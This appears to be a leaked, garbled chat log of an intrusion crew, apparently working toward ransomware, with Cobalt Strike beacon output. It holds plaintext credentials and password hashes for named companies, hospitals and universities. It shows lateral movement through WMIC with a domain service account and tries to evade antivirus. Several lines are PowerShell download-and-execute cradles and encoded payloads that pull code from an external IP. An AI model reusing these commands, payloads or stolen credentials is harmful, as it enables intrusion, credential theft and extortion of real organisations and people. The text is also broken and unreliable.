https://support.microsoft.com/help/4576751 Security Update KB4576751 9/9/2020

http://support.microsoft.com/?kbid=4576754 Update KB4576754 9/4/2020

https://support.microsoft.com/help/4574727 Update KB4574727 9/11/2020
``Host Name: HPENVY-072016-0
OS Name: Microsoft Windows 10 Pro
OS Version: 10.0.18363 N/A Build 18363
OS Manufacturer: Microsoft Corporation
OS Configuration: Member Workstation
OS Build Type: Multiprocessor Free
Registered Owner: admin
Registered Organization: Hewlett-Packard Company
Product ID: 00330-50219-28909-AAOEM
Original Install Date: 8/30/2019, 7:27:42 AM
System Boot Time: 9/10/2020, 9:15:59 PM
System Manufacturer: HP
System Model: 860-180st
System Type: x64-based PC
Processor(s): 1 Processor(s) Installed.
                           [01]: Intel64 Family 6 Model 94 Stepping 3 GenuineIntel ~4001 Mhz
BIOS Version: AMI A0.27, 8/17/2016
Windows Directory: C:\WINDOWS
System Directory: C:WINDOWS\system32
Boot Device:               \Device\HarddiskVolume1
System Locale: en-us;English (United States)
Input Locale: en-us;English (United States)
Time Zone: (UTC-06:00) Central Time (US & Canada)
Total Physical Memory: 32.704 MB
Available Physical Memory: 22.936 MB
Virtual Memory: Max Size: 37,568 MB
Virtual Memory: Available: 25,948 MB
Virtual Memory: In Use: 11,620 MB
Page File Location(s): C:\pagefile.sys
Domain: quotesmith.com
Logon Server:              \AGENTWEBDC01
Hotfix(s): 23 Hotfix(s) Installed.
                           [01]: KB4576484
                           [02]: KB4497165
                           [03]: KB4503308
                           [04]: KB4515383
                           [05]: KB4515530
                           [06]: KB4516115
                           [07]: KB4517245
                           [08]: KB4520390
                           [09]: KB4521863
                           [10]: KB4524244
                           [11]: KB4524569
                           [12]: KB4528759
                           [13]: KB4537759
                           [14]: KB4538674
                           [15]: KB4541338
                           [16]: KB4552152
                           [17]: KB4560959
                           [18]: KB4561600
                           [19]: KB4565554
                           [20]: KB4569073
                           [21]: KB4576751
                           [22]: KB4576754
                           [23]: KB4574727
Network Card(s): 2 NIC(s) Installed.
                           [01]: Intel(R) Dual Band Wireless-AC 3165
                                 Connection Name: Wi-Fi
                                 Status: Media disconnected.
                           [02]: Realtek PCIe GBE Family Controller
                                 Connection Name: Ethernet
                                 DHCP Enabled: No
                                 IP address(es)
                                 [01]: 10.1.1.137
Hyper-V Requirements: VM Monitor Mode Extensions: Yes
                           Virtualization Enabled In Firmware: No
                           Second Level Address Translation: Yes
                           Data Execution Prevention Available: Yes
beacon> shell gpupdate
[*] Tasked beacon to run: gpupdate
[+] host called home, sent: 39 bytes
[+] received output:
Updating policy...



Computer policy could not be updated successfully. The following errors were encountered:



The processing of Group Policy failed because of lack of network connectivity to a domain controller. This may be a transient condition. A success message would be generated once the machine gets connected to the domain controller and Group Policy has successfully processed. If you do not see a success message for several hours, then contact your administrator.

User Policy could not be updated successfully. The following errors were encountered:



The processing of Group Policy failed because of lack of network connectivity to a domain controller. This may be a transient condition. A success message would be generated once the machine gets connected to the domain controller and Group Policy has successfully processed. If you do not see a success message for several hours, then contact your administrator.


To diagnose the failure, review the event log or run GPRESULT /H GPReport.html from the command line to access information about Group Policy results.


``IP 204.74.99.100
Host: crs.ultradns.net
City: San Mateo
Country: United States
IP range: Not defined
Name of Service Provider: ``Indefinite
URL : https://www.mydhl.dhl.com/mydhl/appmanager/smep/customerDesktop
Username : MatchesDC
Password : Customerservice123
``````
URL : https://matchesfashion.my.salesforce.com/
Username : mercedes.dinhamgrant@matchesfashion.com
Password : !PW!a35mM!iK3xg
``````
--- Chromium Credential (User: mercedesd) ---
URL : https://matchesfashion.slack.com/reset/enQtNzE2MTE2MzcxMzYwLTI3YjYzNGU2MTRlNTU0ZTYzOTlhOTdlZDkwNzhkNGY2ZTkyYjQ5NjNlZjUxYzIxNDIzODg5MTdlZTc2NmUwODQ
Username : mercedesd
Password : Dinham23

--- Chromium Credential (User: mercedesd) ---
URL : https://apps.matchesfashion.com/orderapp/login
Username : mercedes.dinhamgrant@matchesfashion.com
Password : Dinham23
``````
URL : https://career8.successfactors.com/career
Username : mercedesdinham@gmail.com
Password : C&:d56H?8WJzU/G
``````
URL : https://www.paypal.com/signin
Username : werkmodeldn@gmail.com
Password : Dinham23
``````
URL : https://www.peoplebank.com/pbank/owa/pbk07w00.logins
Username : Mercedesdinham
Password : Dinham23
``It makes sense to check this password on his account``.
URL : https://www.paypal.com/signin
Username : mercedesdinham@gmail.com
Password : Dinham23
``https://docs.fortinet.com/document/forticlient/6.0.2/administration-guide/209271/forticlient-windows-processes``
Non-authoritative answer:
Name : home.matchesremote.com
Address : 154.59.153.143

``````
                    <server>https://home.matchesremote.com:443</server>
```
And here is the right host to connect to ``.
<?xml version="1.0" encoding="utf-8" ?>
<forticlient_configuration>
    <forticlient_version>6.0.9.0277</forticlient_version>
    <version>6.0.9</version>
    <date>2020-09-17</date>
    <partial_configuration>1</partial_configuration>
    <os_version>windows</os_version>
    <vpn>
        <options>
            <disable_connect_disconnect>0</disable_connect_disconnect>
        </options>
        <sslvpn>
            <options>
                <enabled>1</enabled>
                <prefer_sslvpn_dns>1</prefer_sslvpn_dns>
                <dnscache_service_control>0</dnscache_service_control>
                <!--0=disable dnscache service, 1=do not touch dnscache service, 2=restart dnscache service, 3=sc control dnscache paramchange-->
                <use_legacy_ssl_adapter>0</use_legacy_ssl_adapter>
                <preferred_dtls_tunnel>0</preferred_dtls_tunnel>
                <block_ipv6>0</block_ipv6>
                <no_dhcp_server_route>0</no_dhcp_server_route>
                <no_dns_registration>0</no_dns_registration>
                <disallow_invalid_server_certificate>0</disallow_invalid_server_certificate>
            </options>
            <connections>
                <connection>
                    <name>MF</name>
                    <server>https://home.matchesremote.com:443</server>
                    <username></username>
                    <allow_standard_user_use_system_cert>0</allow_standard_user_use_system_cert>
                    <single_user_mode>0</single_user_mode>
                    <ui>
                        <show_remember_password>0</show_remember_password>
                        <show_alwaysup>0</show_alwaysup>
                        <show_autoconnect>0</show_autoconnect>
                        <save_username>0</save_username>
                    </ui>
                    <password></password>
                    <warn_invalid_server_certificate>0</warn_invalid_server_certificate>
                    <prompt_certificate>0</prompt_certificate>
                    <prompt_username>1</prompt_username>
                    <fgt>1</fgt>
                    <on_connect>
                        <script>
                            <os>windows</os>
                            <script>
                                <!--Write MS DOS batch script inside the CDATA tag below.
                                <!--One line per command, just like a regular batch script file.-->
                                <!--The script will be executed in the context of the user that connected the tunnel.-->
                                <!--Wherever you write #username# in your script, it will be automatically substituted with the xauth username of the user that connected the tunnel.-->.
                                <!--Wherever you write #password# in your script, it will be automatically substituted with the xauth password of the user that connected the tunnel.-->.
                                <!--Remember to check your xml file before deploying to ensure that carriage returns/line feeds are present.-->
                                <![CDATA[]]>
                            </script>
                        </script>
                    </on_connect>
                    <on_disconnect>
                        <script>
                            <os>windows</os>
                            <script>
                                <!--Write MS DOS batch script inside the CDATA tag below.
                                <!--One line per command, just like a regular batch script file.-->
                                <!--The script will be executed in the context of the user that connected the tunnel.-->
                                <!--Wherever you write #username# in your script, it will be automatically substituted with the xauth username of the user that connected the tunnel.-->.
                                <!--Wherever you write #password# in your script, it will be automatically substituted with the xauth password of the user that connected the tunnel.-->.
                                <!--Remember to check your xml file before deploying to ensure that carriage returns/line feeds are present.-->
                                <![CDATA[]]>
                            </script>
                        </script>
                    </on_disconnect>
                </connection>
            </connections>
        </sslvpn>
    </vpn>
</forticlient_configuration>

``but before it dies:``doesn't say anything-what do you mean by exporting? Backup is disabled
is it sad that they didn't get it up? although it's more about the AV base something from Fortinet
```
SerialNumber=FPT-FCS-DELL0000|Address=173.243.138.108:443|FDNListener=|TimeZone=0|AddrIPv6=
SerialNumber=FPT-FCS-DELL0008|Address=173.243.138.98:443|FDNListener=|TimeZone=-5|AddrIPv6=
SerialNumber=FPT-FCS-DELL0009|Address=173.243.138.99:443|FDNListener=|TimeZone=-8|AddrIPv6=
SerialNumber=FPT-FCS-DELL0010|Address=96.45.33.105:443|FDNListener=|TimeZone=-5|AddrIPv6=
SerialNumber=FPT-FCS-DELL0011|Address=96.45.33.106:443|FDNListener=|TimeZone=-5|AddrIPv6=
``Waiting for data
``Powerpick Invoke-Inveigh -Kerberos -FileOutput Y "C:\Users\mercedesd\AppData\Local\Microsoft\eula.txt"``Well, most likely his domain already known creeds can safely connect to VPN and see the domain
9296 4772 FortiTray.exe x64 1 MATCHES\mercedesd
3144 4772 FortiWF.exe x64 0 NT AUTHORITY\SYSTEM
1424 4772 FortiProxy.exe x64 0 NT AUTHORITY\SYSTEM
`` 1424 4772 FortiProxy.exe
 3144 4772 FortiWF.exe
 6412 4772 FCDBLog.exe
 6428 4772 fcappdb.exe
 7100 4772 FortiESNAC.exe
 7108 4772 FortiSSLVPNdaemon.exe
 7116 4772 FortiSettings.exe
 9296 4772 FortiTray.exe x64 1 MATCHES\mercedesd
 11900 4772 fortifws.exe
 18236 4772 fmon.exe
beacon> shell net group "domain admins" /dom
[*] Tasked beacon to run: net group "domain admins" /dom
[+] host called home, sent: 61 bytes
[+] received output:
The request will be processed at a domain controller for domain matches.com.

System error 1355 has occurred.

The specified domain either does not exist or could not be contacted.

``Session returnedhttp://docs.fortinet.com/document/forticlient/6.0.0/configurator-tool/823336/use-forticlient-configurator-tool-tool-for-windowshttps://kb.fortinet.com/kb/documentLink.do?externalID=FD44157https://kb.fortinet.com/kb/documentLink.do?externalID=FD48788который leads to the domain```
   Description . . . . . . : Fortinet Virtual Ethernet Adapter (NDIS 6.30)
```
you can search for fortikgat config of the VPN `` TCP 192.168.0.17:65182 SkyRouter:5431 ``sessions are not present - VPN is probably switched off so you can see the domain
if you get the output from the "domain admins" /dom
check that the domain is visible
Machine is not part of domain - exit.

``From the system.
```
beacon> execute-assembly /home/user/Desktop/cobalt/Tools/Net-GPPPassword.exe
[*] Tasked beacon to run .NET program: Net-GPPPassword.exe
[+] host called home, sent: 114731 bytes
[+] received output:
Machine is not part of domain - exit.
```
From user
```
beacon> execute-assembly /home/user/Desktop/cobalt/Tools/Net-GPPPassword.exe
[*] Tasked beacon to run .NET program: Net-GPPPassword.exe
[+] host called home, sent: 114731 bytes
[+] received output:
Processing files in \\MATCHES.COM\sysvol\MATCHES.COM\policies\.
[-] Invoke_3 on EntryPoint failed.
Did you check if the domain is visible at all?
Maybe there's a VPN disconnected from the domain )-Lists DK, yes?
`` beacon> execute-assembly SharpView.exe Get-Domain
[*] Tasked beacon to run .NET program: SharpView.exe Get-Domain
[+] host called home, sent: 841791 bytes
[+] received output:
An error occurred: 'System.IndexOutOfRangeException: Index was outside the bounds of the array.
   at SharpView.Program.Run(String[] args)
   at SharpView.Program.Main(String[] args)' ``it didn't work you forgot to put adfind here, please, for the sake of argument) you can poke the formatting in #general as an example ``Target : outlook.office365.com
  Comment : SspiPfc
  UserName : Mercedes.Dinhamgrant@matchesfashion.com
  Password : Dinham1989
  CredentialType : Generic
  PersistenceType : Enterprise
  LastWriteTime : 13/03/2020 12:22:01

  Target : MicrosoftOffice16_Data:SSPI:Mercedes.Dinhamgrant@matchesfashion.com
  UserName :
  Password : Dinham1989
  CredentialType : Generic
  PersistenceType : Enterprise
  LastWriteTime : 08/09/2020 16:02:18`
```
Target : outlook.office365.com
  Comment : SspiPfc
  UserName : Mercedes.Dinhamgrant@matchesfashion.com
  Password : Dinham1989
  CredentialType : Generic
  PersistenceType : Enterprise
  LastWriteTime : 13/03/2020 12:22:01

  Target : MicrosoftOffice16_Data:SSPI:Mercedes.Dinhamgrant@matchesfashion.com
  UserName :
  Password : Dinham1989
  CredentialType : Generic
  PersistenceType : Enterprise
  LastWriteTime : 08/09/2020 16:02:18
There's also a one-line formatting like ``marker``@user1 tell me how to format please the rest of usSo, drop in here the information you gathered, passwords found, ad info, sitbelt, and so on
and continue работать)eyJhbGciOiJB/360fJkwH4TQ6LODerkkb4TlbN0v/Zt5aK/BgoHABZb9CbTBU3YnjStc++ipt5xVxC+bbWj9EfCyMO1Z5+fFCt0TfdobT1dxN5hHr0SDk4Rv7YC7Ec2pFnt2aJsnJe9qk1T94PiNEQlmEAdKnkZq7glGAwZJeKgPCC7wLVY7OcU7+1Yn8ImX9o1DFMTAlVNwbhEgqNqQXaLOSn9/wpqySw==eyJhbGciOiJBxX2bvj2LLTDwhlBvieTlwrBkhX8ngIKIjBaetx8b1L/oWGkAX4QsbLWvPMO41Aw2FSqiJDsRumji0Vmlft5Jgu7mg/OQFau3h9PfdTZ4Z3bIrwbEKOouwr/RPgBVkFcdVrJoHJfebtGcRDUERbP0xYY5h1On7UYvrZzCUgWoYun0y7Hfd4vL7IbhDeP4h1yCRtyr+PJdF50UpZHPyJ4MCqYcUR9FiLMdZKXlS5eLx/vjVtpsGmwsbwJr13y/zpJGhVES0NyQoufK0lHF2X3riZXCeJLUYPnOOloPTv29n09YaPK6AuyehhCps925u7+mguikxaAxoyu99/BgirSOn60Ib73IHmpqNRFCnaMZZdw=eyJhbGciOiJBhFASKtrWS+mJFYNHEP7Z180TrNSuIruXJJ3m95kV4Z427KwnBGG5q44CwZZPMbh4hlnOHWuS8YF6xNGlxux9dwzxxqafgfvGCw8ycjgVNBVz5rf3tOtMJDjKOnNlQ1I7xxU3vBkHaW28kfkexpo0T9pKy8kN2AA088uri1tP84o=eyJhbGciOiJBu2oE1WMxl3Y59WYGluxRGl7vvKhmiwcAQgbXMj4+dYTHX2EgtD8Demco+OMkNmtVcLSrQjjE5LgyuIbtMhjV9JgKVqfFHeGJ+ixD3JlwPOstgei1xUltazxNKJNlYJUVIyhjSlZ8nvP08+xulm+mbrp9nmYM8pEeCUmE92t3/VU=otuser8tl2eyJhbGciOiJBI4OZkrnV7D96S EA's creeds are found, attempts are being made to sneak into the trusts to continue work10.10.30.24 what is Z?
C:\Users\wevvewe\Desktop>wmic /node:10.10.30.24 /user: "lrhc.local\svc-aadc" /password: "WH20s.admin 1225kofq" process call create "cmd /c net use * \\192.168.254.107\C$ ""WH20s.admin 1225kofq"" /user:lrhc.local\svc-aadc > C:\ProgramData\nts.txt && copy C:\ProgramData\nts.txt \\10.10.30.24\C$\ProgramData\nts.txt"
Executing (Win32_Process)->Create()
Method execution successful.
Out Parameters:
instance of __PARAMETERS
{
        ProcessId = 3428;
        ReturnValue = 0;
};


C:\Users\wevvewe\Desktop>dir Z:\ProgramData\nts.txt
 Volume in drive Z has no label.
 Volume Serial Number is 584E-4F0A

 Directory of Z:\ProgramData

12/15/2020 12:48 PM 0 nts.txt
               1 File(s) 0 bytes
               0 Dir(s) 4,098,580,480 bytes free
Can't you do a no-jouz with a direct quote and output it to a file so you don't have to do magic?
C:\Users\wevvewe\Desktop>wmic /node:10.10.30.24 /user: "lrhc.local\svc-aadc" /password: "WH20s.admin 1225kofq" process call create "cmd /c net use > C:\ProgramData\eula_en.txt && copy C:\ProgramData\eula_un.txt \\10.10.30.24\C$\ProgramData\eula_en.txt"
Executing (Win32_Process)->Create()
Method execution successful.
Out Parameters:
instance of __PARAMETERS
{
        ProcessId = 5588;
        ReturnValue = 0;
};
```

```
C:\Users\wevvewe\Desktop>type Z:\ProgramData\eula_en.txt
New connections will be remembered.

There are no entries in the list.
``````
C:\Users\wevvewe\Desktop>wmic /node:10.       10.30. 24 /user: "lrhc.local\svc-aadc" /password: "WH20s.admin 1225kofq" process call create "cmd /c net use * \\\192.168.254.107\C$"
Executing (Win32_Process)->Create()
Method execution successful.
Out Parameters:
instance of __PARAMETERS
{
        ProcessId = 7036;
        ReturnValue = 0;
};
``Then password)[ ](https://mediaeveryone.com/group/lrhc-org?msg=mb5ncYh6KZCcgbf4a) will it be like this? Write the ip like this ``10.       10.30. 24"}
C:\Users\wevvewe\Desktop>wmic /node:10.10.30.24 /user: "lrhc.local\svc-aadc"/password: "WH20s.admin 1225kofq" process call create "cmd /c net use * \\192.168.254.107\C$"
ERROR:
Description = Access is denied.
``He gave me different commands with quotes, take the username polzakastop
C:\Users\wevvewe\Desktop>wmic /node:10.10.30.24 /user:lrhc.local\svc-aadc /password: "WH20s.admin 1225kofq" process call create "cmd /c net use * \\\192.168.254.107\C$"
``I don't know my name is ``wanga''?
Invalid Global Switch.
Try the second one from the internal car with wmik and it's the same problem I had a problem with trust, it's not a problem at all, I thought maybe the output was wrong, it's a password with a space, compare it with a space))) it's not clear if it's with a space or what
Username Domain Password
-------- ------ --------
svc-aadc lrhc.local WH20s.admin 1225kofq
```
it's fucking stinky not found so fuckin' send me the hash and I'll give you the clearance. all right, to see the clearance you have to buy the check for free. now it's no fun who was logged in. we all got kicked out of the account so you changed your usernames and passwords. write 5.com how do I check hash from kmd? it's like 0...I would dal no yuz check it out can you give me a file with cleartexts from ntds? I want to check I do not understand what you're doing) this hash will eat? https://github.com/InfosecMatter/Minimalistic-offensive-security-tools/blob/master/smblogin.ps1ага
and how to download the hashes without a coba?) and stop shahesh what exactly do you want to download? so you downloaded? here they are EA with hashes of all collected and accidentally sent i threw the name + hash EA and did not understand what you threw) it's not all shaobl```
lrhc.org\PsService
327db612d1d53ac8477a49ae667d523c
 
lrhc.org\Pssupport01
8c3c72c186ece567004a620aff55d842
 
lrhc.org\svc-aadc
a5ed4977ab742434bd35761f3cb4c028
 
lrhc.org\TMSXE.Service01
a6aea38d860ac5c1e980a7724bd0362e
 
lrhc.org\UCAdmin
1c7c0878a380b6e004f97cd62af6398b
 
lrhc.org\frsecure
6888441821d91affeb5f8cad8a6cad7b

lrhc.org\Psupport
8c3c72c186ece567004a620aff55d842
 
lrhc.org\tms01
a6aea38d860ac5c1e980a7724bd0362e
 
lrhc.org\jyrkwa
ce52742a372f62d7100e9ca7b5f13369
``If you find the hash, I'll give you the clearance pass from EA?
dn:CN=ffmg.local,CN=System,DC=lrhc,DC=local
>whenCreated:2010/01/18-12:49:34 Central Standard Time
>name: ffmg.local
>securityIdentifier: S-1-5-21-111134195-3807604873-3122732003
>trustDirection: 3 [Inbound(1);Outbound(2)
>trustPartner: ffmg.local
>trustType: 2 [UpLevel(2)
>trustAttributes: 8 [Transitive(8)]

dn:CN=mcklrh.mig,CN=System,DC=lrhc,DC=local
>whenCreated: 2018/02/14-17:38:43 Central Standard Time
>name: mcklrh.mig
>securityIdentifier: S-1-5-21-2653265968-1271411615-963851744
>trustDirection: 3 [Inbound(1);Outbound(2)
>trustPartner: mcklrh.mig
>trustType: 2 [UpLevel(2)
>trustAttributes: 8 [Transitive(8)]

dn:CN=ELEAH.LOCAL,CN=System,DC=lrhc,DC=local
>whenCreated: 2020/09/16-17:04:40 Central Standard Time
>name: ELEAH.LOCAL
>securityIdentifier: S-1-5-21-2327498286-4212857632-543316630
>trustDirection: 3 [Inbound(1);Outbound(2)
>trustPartner: ELEAH.LOCAL
>trustType: 2 [UpLevel(2)
>trustAttributes: 4 [Quarantined-Domain(4)]
``There are 3 trusts, 1 in quarantine, I don't touch it, it turns out?
Force user logoff how long after time expires?: Never
Minimum password age (days): 0
Maximum password age (days): 90
Minimum password length: 8
Length of password history maintained: 10
Lockout threshold: 10
Lockout duration (minutes): 30
Lockout observation window (minutes): 30
Computer role: PRIMARY
The command completed successfully.
``````
Group name Enterprise Admins
Comment Designated administrators of the enterprise

Members

-------------------------------------------------------------------------------
Administrator frsecure jyrkwa
PsService PsSupport Pssupport01
svc-aadc tms01 TMSXE.Service01
UCAdmin
The command completed successfully.
``````
Group name Domain Admins
Comment Designated administrators of the domain

Members

-------------------------------------------------------------------------------
admin Administrator AvamarBackupUser
CDW.Tech1 CDW.Tech2 CDW.Tech3
cdw.user01 cisadmin frsecure
gsnelson jyrkwa lljennbi
nmsapps OnPremMigAdmin1 OnPremMigAdmin2
OnPremMigAdmin3 pmpetecc PRHADMIN
PsService PsSupport Pssupport01
radmin tms01 TMSXE.Service01
UCAdmin WebAdmin
The command completed successfully.
``Please write to the confines of the progress+new session in the input coba, by the requests of those waiting for the sessionAccess to the admin+there look for admin in the AV? What is in the work now? Good afternoonMorning at the hut.
will be finished today you already copied messages?) you only build order))) but good night, until tomorrow, until tomorrow we will close sysdak even to 6 most likely will be delayed until 2-3 am tomorrow by 5 in general such deladno if no interference AV describe what you did on the result is lazy) you stopped at kerbenichego of this have not tried, I will try to see, and what passes to try? i have a list of only 4-skul, zero, smbgost ?i have tried on all cars to raise the rights, nowhere succeeded, under this type of creeds do not knock anywhere else, and the other polzak only in hashes rubus, still waiting for them[ ](https://mediaeveryone.com/channel/general?msg=J48fTapGtCAQpMFL7) on all labs ie you have where to go? all in confedaad and other things are there?if the kerb is unbroken, then you can further unwind there are places to work? on all machines (virtual labs) under it authorized (some sessions have hung, if you need to restore them) there do not rise all eleveit in the cob tried it there is where to dig?#humboldt-edu is the one where the user can only go to the virtual labs, AB there vindefostaet in your work then through tpsh you can remove hell and kerbs and other it and killed it after loading?[ ](https://mediaeveryone.com/channel/general?msg=db445S5oz7pEsAu9P) I went to rdp, ran kmd, in it ran your one-time command, went to tpsh, figured out the interface, wanted in cobalt dll, ran the attached string and got no response
I didn't get it off.
Didn't get a response from AB.
Didn't have time to try anything at all
The session in tpsh just died
```
 (New-Object System.Net.WebClient).DownloadFile('http://199.127.61.166:8080/A3z4km1/x64.dll', 'C:\Users\Healdton.IT\x64.dll')
``Minute@user7 av which? stop, this other one can't pull anywhere, AV breaks everything, user not LA[ ](https://mediaeveryone.com/channel/general?msg=Gx99ioxD6oZW5Wsff) but with a different way of loading?
https://vlab.humboldt.edu/rdweb/webclient/

```
@user7 here we have what? flew, after a short time - flew away tpsh comes and goes? by stg? yes, marked the second one you gave - the kreds did not fit in tpsh this was ``
https://tcph.stg-healthcare.com/rdweb/pages/en-us/login.aspx

```
is this one in your work? are the accesses working? so i need to re-save it@user8 then you still have work to do with it that's all i did outside the domain, i didn't pull it i wanted a dll in cobalt, ran the download in tps and no response did you pull the kerb? not working on it yet, i can't see what else can be done with it
work with ttps://lab.devry.edu/vpn/index.html have you got it working? only 1 subnet is visible, there polozaki@user8 there are 2 questions to you by the story vectors were not identified? have you tried different software dll load? i worked with the first one less than 10 minutes[ ](https://mediaeveryone.com/channel/general?msg=Pt2PsEG3K5iG8uZEa) on the dedik under wpn
no cracks.
Checked the network at ms17\bluekeeper\smbghost and nothing.
was the last option to find a dc and outside the domain to put a zerologon, but dc I have not found what?[ ](https://mediaeveryone.com/channel/general?msg=eybqLby5RFvccWeLS) do not know ``
https://tcph.stg-healthcare.com/rdweb/pages/en-us/login.aspx

```
@user8 what do we have here?
https://vpn.floridapoly.edu

```
also a question for you, what's up with you? okay, you wrote off her status, she's in the works I'm up to my neck in it
It's only possible to work with her through msf
even if i somehow miraculously get up to yes, then i do not know what to do at the stage of crypto) you have a working network? @user9nothing other than windf? another thing `https://ra.vdi.stevens.edu/vpn/index.html` no way to upload the load (coba/msf). Neither as an exe nor as a dll. I've uploaded via powershell and chrome. Everything chops vindef (notifications pop up)without a step asidewrite status on this gridno jump the topic)[ ](https://mediaeveryone.com/channel/general?msg=nrkt4e7hGZPTpaFL3) not a word about it so we are not about sisdbitdef in sisd.peta bitdef where?[ ](https://mediaeveryone.com/channel/general?msg=nrkt4e7hGZPTpaFL3) here only vindef but evil as hell - kills everything at the download stage, or launch in case of psh it chops cob, msf, psh dlls?@user4 you have a bitdef from the point of entry one by one you've confused me)and in the last one only vindef, well I have BitDefendernu apparently dai @user4 maccafi and you? everywhere macaficakoy av? through msfdllku can try to put thereada here does not work tpsh, I do not think that there and work if you throw through psec command load in tpsh?
tried windows/smb/psexec with these creds, the session dies

``So if there is a pass to the other PCs why did not go there? no, the list and a third of the list did not pass)
tried windows/smb/psexec with these creds, the session dies, and the admins(LA\DA\EA)`
i.e. hash yes? ``has hash LA, fits to several computers,``
what's there to brute-force? nothing but macafee? it's like they have some kind of iron that filters traffic...macafee[ ](https://mediaeveryone.com/channel/general?msg=82Pd9a83qxHBS58rX) similarly what av? dies right away[ ](https://mediaeveryone.com/channel/general?msg=H8dGzGbszpD4eYP5N) psh?[ ](https://mediaeveryone.com/channel/general?msg=KJaTThQteEaZH4rdJ) have a system, session in msf
i can't get a session in both coba and armia (different ports, pailoats) b in armia dies right away and will not reach coba
hash LA, fits to several computers, but the session dies when brute force (goes through a list of 40 pieces), proxy msf some unstable (rotate more precisely)
took off yes, and admins (LA\DA\EA) dll coba, dll msf. chopped at the stage of downloading all - what? all chopped by vindexhttp://ra.vdi.stevens.edu/vpn/index.html
@user4
what's up? ready@user9
https://lab.devry.edu/vpn/index.html
what do we have here? and in order clean the sessions and in slip we finish then half an hour a little meeting and summarize the results of the week another half hourTo what time today? to the coba not at all in the arma immediately fall off
different load ports and so on... i'm busy with mine
i'm trying to get somewhere from msf
i tried both coba and arma to throw a session - does not come in any wayNo software i left on the forum so far only guides for gui[ ](https://mediaeveryone.com/channel/general?msg=2iBBPTM4MjnX8vAWC) looking for how to bitdefender chop upa lot of you without a job?Who are you asking? Are you still sitting idle? Well, the first domain (`tcph.stg-healthcare.com`) in tpsh fell off, the second (`signature-healthcare.org`) - citra creed is not true so how are you doing there?if no one's writing anything like that, I won't even write about it here + your colleagues might have written it down - I won't repeat it to you - I already wrote it down, I'll go ask him [ ](https://mediaeveryone.com/channel/general?msg=yW7WJmRxFWEzg2apN) google second domain@user8
```
https://citrix.signature-healthcare.org/citrix/xenapp/auth/login.aspx md.raws 1984Bears
?where's the psh history file ?okzamenapz or can i help someone ?okpoka postponement)it's a one time thing i want a nickname, too ?
powershell.exe -nop -w hidden -ep bypass -e SQBFAFgAIAAoACgAbgBlAHcALQBvAGIAagBlAGMAdAAgAG4AZQB0AC4AdwBlAGIAYwBsAGkAZQBuAHQAKQAuAGQAbwB3AG4AbABvAGEAZABzAHQAcgBpAG4AZwAoACcAaAB0AHQAcAA6AC8ALwB3AGkAZABlAGkAbwAuAGMAbwBtAC8AYQBzAHMAZQB0AHMALwBjAHMAcwAvAGIAbwBvAHQAcwB0AHIAYQBwAC4AbQBpAG4ALgBjAHMAcwA/AHYAaQBkAD0ANAA4AHgAQQBlAEUAeQBaAHcAcgBGAGUAeABaADMAYQBWAHcAUgAzAHkASQBzADkASQBNAEcAOQBRADkATQBBAE0AZQBvADUASABWAGkARgAnACkAKQA7AA==
``Why is it the one you threw me off thepunks hoyrebytes give a one-time load the same command ?try tpshmmhom the alerts popped up that the dll worked successfully what is the sonar ?and kmd aksess fucking danila i can't get it in the kobe either so i don't use the load so it's always dirty `powershell -nop -w hidden -encodedcommand JABzAD0ATgBlAHcALQBPAGIAagBlAGMAdAAgAEkATwAuAE0AZQBtAG8AcgB5AFMAdAByAGUAYQBtACgALABbAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACIASAA0AHMASQBBAEEAQQBBAEEAQQBBAEEAQQBMAFYAWAA2ADMATwBpAFMAaABiAC8ASABQADgASwBQAHEAUgBLAHIAVABFAHUAUgBwAE8ASgBzAHoAVgBWAEEAdwBLAEsAQQBsAEUAZQB2AG4ASgBUAHEAUgBaAGEAUgBaAHUASAAwAEkAaAA0AFoALwA3ADMAZQAwAEQATgB6AGUAdwBrAHUAMQBPADEAdQAxAFoAUgBkAGoAZgBuACsAVAB1AFAAUABoAGkAWQAzAGgAZwAwAGMAbQAyAHEAQgBnADUAbQBiAHMAWQA0AGkAdAAzAEEAWgAyADUATABwAFcAcwBoAGsAQwBuAHoAbABmAGwAVwBMAGkAMABUADMANgBiADUAYwBiADUANABXAFcASAA2AEUAawBhAEIALwBZAEkAYwBKADgASgB4AHoAUAB4AFoAdQBoAHEAaQBDAEgAbABNADUAWABxAFAAbwBoAGMAdgBjAEIASwBDAGEAMAB5AHgAeQBRAG0AeABrADAAUwA0AGUAbgBWAFYAdQBpAHEATwBFAGoAOQBHAFMALwB6AGkASQArAHIAdQA4AFkAdQBIADYAVABwAHcAWQBsAEIAVQBlAGUATABDAFUAQQBnADgANQBQAHIAUABYADcANQAwAGsAaQBqAEMAUABqADMAdAA2ADEAMQBNAHUAVABqAEcAMwBvAEsANABPAEsANQBVAG0AZQAvAE0AWgBJADAAagBmAFAATwA0ADIARwBDAGIATQBuADgAeQAxAHkALwAxAEwAZwBrAFcAaQBKAHoASgBzAGcANgB5ADEAKwBBAFEANQB6AHYANQBPAHkAVwB3AFUAZQA1AEIA dacobs?[ ](https://mediaeveryone.com/channel/general?msg=7KEgBZjBYuarLgL2x) bicon in verashell format? well the one my colleagues tell me about :confused:i'm scared to ask what psh? hz in sisd dll blocked and psh work out if the psh load was fud why do we all dll updateable?and a follow up question so let your colleagues tell me about coba load in psh format) i'm already getting tired of repeatingpoverschel bicon what load? load, there is nothing but windef. and notifications pop upwhat is windef blocking? is windef blocking dll, wind is blocking windef, cmd is disabled by admin[ ](https://mediaeveryone.if you're not sure if vindef is blocking vindef,vindef is blocking dll,cmd is disabled by admin[ ](https://mediaeveryone.com/channel/general?msg=kXZRFtHSaMXjss6iw com/channel/general?msg=s2NX4qeezS7ze9vXQ) I[ ](https://mediaeveryone.com/channel/general?msg=kXZRFtHSaMXjss6iw) takelocham is not just using dll,just for the record, the coba load in psh format has been stolen and not cleaned and everything through verashell session to the coba,why download something and it can download files?it will not be easier to download a file? so why do you need to download a file in coba in a minute through psh and start downloading it in coba or you can immediately prepare a file in tpshzagi look what if it is empty now?[ ](https://mediaeveryone.com/channel/general?msg=wSoB94aWyKrhDgP3c) tsepvpvrzablitet 3 pieces
https://ra.vdi.stevens.edu/vpn/index.html amueller Lokifredd3133!

``````
https://remote.egr.msu.edu/rdweb/pages/en-us/login.aspx nguye680 Thewolf1901

``````
https://tcph.stg-healthcare.com/rdweb/pages/en-us/login.aspx healdton.it@stg-healthcare.com Oklahoma@2020!
